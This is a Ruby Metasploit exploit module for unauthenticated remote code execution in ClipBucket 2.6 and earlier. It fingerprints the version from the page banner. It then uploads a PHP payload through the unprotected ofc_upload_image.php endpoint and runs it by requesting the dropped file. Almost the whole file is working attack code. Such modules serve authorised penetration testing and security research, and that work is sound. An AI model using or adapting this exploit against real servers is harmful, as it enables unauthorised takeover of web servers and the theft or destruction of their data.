##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
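class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "ClipBucket Remote Code Execution",
        'Description' => %q{
          This module exploits a vulnerability found in ClipBucket version 2.6 and lower.
          The script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be used to
          upload arbitrary code without any authentication. This module has been tested
          on version 2.6 on CentOS 5.9 32-bit.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Gabby', # Vulnerability Discovery, PoC
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
        'References' => [
          [ 'PACKETSTORM', '123480' ]
        ],
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [
          ['Clipbucket 2.6', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-10-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
      ]
    )
  end

  # Base path of the ClipBucket install, taken from TARGETURI.
  #
  # @return [String]
  def uri
    target_uri.path
  end

  # Fingerprints the install by scraping the "ClipBucket version X.Y" banner
  # from the landing page and compares it with the last affected release (2.6).
  #
  # @return [Exploit::CheckCode] Unknown when the page cannot be fetched or carries
  #   no version string, Safe for versions newer than 2.6, Appears otherwise.
  def check
    vprint_status("Trying to detect installed version")

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(uri, "")
    )

    version = nil
    if res && res.code == 200
      banner = res.body.to_s.match(/ClipBucket version (\d+\.\d+)/)
      version = banner[1] if banner
    end
    return Exploit::CheckCode::Unknown unless version

    vprint_status("Version #{version} detected")

    # Compare as versions, not strings: lexicographically "2.10" < "2.6", so a
    # plain string comparison would report newer releases as vulnerable.
    if Rex::Version.new(version) > Rex::Version.new('2.6')
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Appears
    end
  end

  # Drops the PHP payload through the unauthenticated ofc_upload_image.php
  # handler, which writes the raw POST body to tmp-upload-images/ under the
  # attacker-chosen "name" query parameter, then requests the file to run it.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the upload is not confirmed
  #   (no response, or a response without the expected "Saving your image" line).
  def exploit
    peer = "#{rhost}:#{rport}"
    # Alphanumeric only, so the name is safe to interpolate into the regex below.
    payload_name = rand_text_alphanumeric(rand(5..14)) + ".php"

    print_status("Uploading payload [ #{payload_name} ]")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"),
      'headers' => { 'Content-Type' => 'text/plain' },
      'vars_get' => { 'name' => payload_name },
      'data' => payload.encoded
    )

    # Use an accurate failure reason instead of Failure::None, which denotes "no failure".
    fail_with(Failure::Unreachable, "#{peer} - File wasn't uploaded, aborting!") unless res

    # The handler confirms a write with "Saving your image to: ../tmp-upload-images/<name>".
    # A body mentioning HTTP_RAW_POST_DATA is treated as a failed upload (presumably the
    # PHP build did not expose the raw request body to the script - confirm on target).
    uploaded = res.code == 200 &&
               res.body.to_s.match?(/Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/) &&
               !res.body.to_s.match?(/HTTP_RAW_POST_DATA/)
    fail_with(Failure::UnexpectedReply, "#{peer} - File wasn't uploaded, aborting!") unless uploaded

    # Registered by bare name; the payload executes from tmp-upload-images/, so a
    # relative unlink should resolve there. NOTE(review): confirm if cleanup fails.
    register_files_for_cleanup(payload_name)

    print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name)
    )

    # A nil response is tolerated here: a payload that hands off to the handler may
    # never complete the HTTP reply. Only an explicit non-200 is reported.
    print_error("Unexpected response, probably the exploit failed") if res && res.code != 200
  end
end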